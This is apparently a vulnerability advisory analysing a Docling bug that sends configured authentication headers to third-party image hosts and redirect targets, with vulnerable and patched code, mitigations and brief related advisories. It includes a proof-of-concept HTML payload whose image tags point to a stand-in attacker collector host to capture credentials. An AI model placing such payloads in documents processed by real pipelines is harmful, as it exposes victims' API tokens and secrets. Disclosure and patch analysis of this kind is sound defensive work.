Oct 8, 2026·6 min read·5 visits
Docling versions before 2.132.0 leak custom HTTP authentication headers configured in HTMLBackendOptions.headers to arbitrary third-party domains when retrieving remote images embedded in processed documents or during cross-origin redirects.
A technical analysis of CVE-2026-105742 (GHSA-p3fw-7699-7926), a sensitive information disclosure vulnerability in the Docling document processing library. Vulnerable versions of Docling indiscriminately forward custom HTTP headers, such as authentication tokens, to arbitrary third-party origins and during cross-origin redirects while fetching remote image assets from untrusted HTML and EPUB documents.
Docling is an advanced, layout-aware document conversion library widely adopted in data pipelines, machine learning ingestion workflows, and retrieval-augmented generation (RAG) applications. The library natively parses complex, document-centric formats such as HTML and EPUB. During parsing, the software extracts, fetches, and processes embedded image assets specified by external resources. This design requires Docling to interact directly with remote HTTP servers to download and render embedded graphics.
To fetch images securely from authenticated systems or private content delivery networks (CDNs), developers can supply custom HTTP headers, including API keys, bearer tokens, or custom session identifiers, through HTMLBackendOptions.headers. However, versions of Docling prior to 2.132.0 contain a critical architecture flaw in how headers are scoped. Instead of restricting headers to the document's original domain or explicit targets, the system merges configured credentials into all outbound image requests.
This behavior exposes a substantial attack surface. When Docling processes a maliciously crafted document, the layout parser attempts to resolve all embedded images. If an image source points to an untrusted domain controlled by an external actor, the library transmits the custom headers to that host. This failure of network-level boundary separation allows attackers to harvest active credentials.
Furthermore, the issue persists during redirects. When a request to a benign-looking URL is redirected to an untrusted third party, standard HTTP clients do not clean or strip custom header keys. As a result, sensitive keys are transmitted directly to the redirect target. This behavior circumvents origin boundaries and exposes credential tokens.
The underlying technical flaw resides within the remote image retrieval loop inside docling/backend/utils/image_resource_loader.py. When encountering an external image source, the system instantiates an image loader session to fetch the binary asset. The loader builds a dictionary of HTTP headers, initially defining standard parameters such as the request Range header.
In affected versions, the loader merges the global, user-configured header dictionary into the active request header set. This merging process occurs blindly for every asset, without assessing whether the asset's URL matches the security domain of the root document. The system possesses no internal validation routines to isolate header injection on a per-origin basis.
# Vulnerable implementation pattern
if self.headers:
headers.update(self.headers) # Blind merge of user secretsThe secondary compounding flaw stems from standard HTTP redirect handlers. While Python's standard requests library automatically strips default authorization headers during cross-origin redirects, it does not evaluate or strip user-defined custom headers such as X-API-Key or X-Session-ID. Since the resource loader does not inspect redirects manually, these custom secrets are carried over to untrusted endpoints.
The vulnerability was fixed in commit 5e469137f275ffc443306a30d12a3a45bceb80fb by changing how headers are handled. The original code performed an unconditional dictionary update, whereas the patch enforces strict host-of-origin verification.
# PRE-PATCH: Blindly merging user headers
headers = {"Range": f"bytes=0-{max_size - 1}"}
if self.headers:
headers.update(self.headers) # Vulnerable blockThe fix introduces an explicit origin validation utility named url_origin. This utility parses the schemes, target hosts, and ports of remote URLs to establish clear boundaries. It is coupled with the headers_allowed_origins configuration parameter.
# POST-PATCH: Validation and Manual Scoping
def url_origin(url: str) -> Optional[tuple[str, str, Optional[int]]]:
parsed = urlparse(url)
if not parsed.scheme or not parsed.hostname:
return None
default_ports = {"http": 80, "https": 443}
port = parsed.port or default_ports.get(parsed.scheme.lower())
return (parsed.scheme.lower(), parsed.hostname.lower(), port)
def _request_headers(self, url: str) -> dict[str, str]:
# Restrict custom headers to verified origins only
if self.headers and url_origin(url) in self.header_origins:
return dict(self.headers)
return {}Additionally, automatic redirect handling was disabled. The loader now processes redirects step-by-step. During each redirection hop, the target URL is analyzed, and the system dynamically strips any headers that do not match the destination's security origin. Furthermore, the browser context for Playwright rendering is forced offline (offline=True), with requests proxied through custom handlers to guarantee enforcement.
To exploit this vulnerability, an attacker must supply a document containing an image asset hosted on a server under their control. The exploit requires that the victim has configured sensitive headers for authentication and enabled remote fetching.
<!-- Malicious HTML Payload: exploit.html -->
<html>
<body>
<!-- Image pointing directly to attacker's logging endpoint -->
<img src="http://attacker-controlled-collector.internal/leak.png" />
<!-- Alternative utilizing cross-origin redirect -->
<img src="https://trusted-domain.com/redirect?to=http://attacker-controlled-collector.internal/leak.png" />
</body>
</html>When the victim invokes Docling to parse the document, the parser executes the following sequences:
As the image resource loader processes the URL, it sends an HTTP GET request containing the user's custom headers directly to the attacker-controlled collector. The collector logs the request headers, extracting sensitive credentials without generating any system alerts.
The primary consequence of this vulnerability is the compromise of system secrets and API credentials. In corporate data processing environments, Docling is frequently used within automated pipelines. If these pipelines process user-submitted documents, attackers can retrieve internal system tokens, private API keys, and session cookies.
Because the vulnerability has a CVSS base score of 3.7, its severity is characterized as low due to the high attack complexity (AC:H). This classification is due to the requirements that remote fetching must be explicitly enabled and that custom headers must be configured. These conditions are not present in default Docling configurations.
From a threat intelligence perspective, there are no recorded instances of active exploitation in the wild, and the vulnerability is not currently listed in the CISA KEV catalog. However, because it is simple to exploit once the necessary conditions are met, developers should treat this as a high-priority issue for any microservices that process untrusted documents.
The primary defense against this vulnerability is updating the docling and docling-slim packages to version 2.132.0 or higher. This update changes the image fetching logic to restrict custom headers to specified origins.
When using patched versions, developers must configure the allowed origins explicitly in their application code. This ensures that custom headers are only sent to verified domains.
# Patched implementation incorporating restricted origin boundaries
from docling.datamodel.backend_options import HTMLBackendOptions
from docling.document_converter import DocumentConverter, HTMLFormatOption
from docling.datamodel.base_models import InputFormat
html_options = HTMLBackendOptions(
fetch_images=True,
enable_remote_fetch=True,
headers={"Authorization": "Bearer SECRET_TOKEN"},
# Explicitly restrict credentials to trusted servers
headers_allowed_origins=["https://trusted-internal-storage.com"]
)
converter = DocumentConverter(
format_options={InputFormat.HTML: HTMLFormatOption(backend_options=html_options)}
)If you cannot apply the patch immediately, you can mitigate the vulnerability by setting enable_remote_fetch=False in your backend configuration. Alternatively, you can use network-level routing policies or proxy layers to inject authentication credentials, rather than passing keys within the application runtime.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
docling docling-project | >= 2.95.0, < 2.132.0 | 2.132.0 |
docling-slim docling-project | >= 2.95.0, < 2.132.0 | 2.132.0 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-201 / CWE-522 |
| Attack Vector | Network (AV:N) |
| CVSS Severity | 3.7 (Low) |
| EPSS Score | 0.00218 (Percentile: 11.24%) |
| Exploit Status | Proof-of-Concept |
| CISA KEV Status | Not Listed |
The product sends sensitive information to endpoints that are outside of the intended control sphere.
Docling, a tool for parsing and processing diverse document formats, is vulnerable to arbitrary file read, arbitrary file write, and potential remote code execution (RCE) in versions 2.94.0 through 2.131.0. The vulnerability occurs when applications configure Docling to use the Tectonic engine for rendering TikZ diagrams into images. Because the compilation did not restrict hazardous TeX primitives or sandbox the environment, an attacker can supply crafted documents containing malicious TikZ definitions to access or modify local files and execute arbitrary commands under the privileges of the processing application.
An SSRF guard bypass vulnerability in the Docling document conversion engine allows unauthenticated attackers to bypass internal IP access controls. The vulnerability exists due to a DNS rebinding Time-of-Check Time-of-Use (TOCTOU) condition, URL authority parsing inconsistencies, and unvalidated network requests triggered during headless browser page rendering.
CVE-2026-106121 is a Denial of Service (DoS) vulnerability in the RabbitMQ Java Client library (amqp-client) affecting versions prior to 5.37.0. The vulnerability resides in the legacy, custom JSON-RPC parsing class com.rabbitmq.tools.json.JSONReader. When parsing malformed or truncated payloads ending within a quoted string or single-line comment, the parser's scanner enters an infinite loop. This occurs because the loop lacks an exit condition for the end-of-input sentinel character returned by the iterator, leading to either CPU exhaustion or a JVM crash from an OutOfMemoryError.
An authenticated Regular Expression Denial of Service (ReDoS) vulnerability in TryGhost Ghost (CMS) versions 4.0.0 through 6.66.x. An attacker with administrator privileges can upload crafted content import archives containing pathological directory names or migration patterns, triggering exponential backtracking in the Node.js V8 engine.
CVE-2026-105645 is a regular expression denial of service (ReDoS) vulnerability affecting Ghost, an open-source Node.js content management system. The vulnerability exists within directory import handlers and the external media inliner, allowing authenticated administrators to trigger catastrophic backtracking in the V8 JavaScript engine, resulting in infinite loops, 100% CPU utilization, and total denial of service.
A Stored Cross-Site Scripting (XSS) and Unrestricted Upload of File with Dangerous Type vulnerability in Ghost CMS (versions 4.0.0 to 6.66.x) allows remote attackers to execute arbitrary JavaScript in the context of an administrator's session. The flaw lies in the content import subsystem, which extracted and stored SVG files without sanitization or binary verification.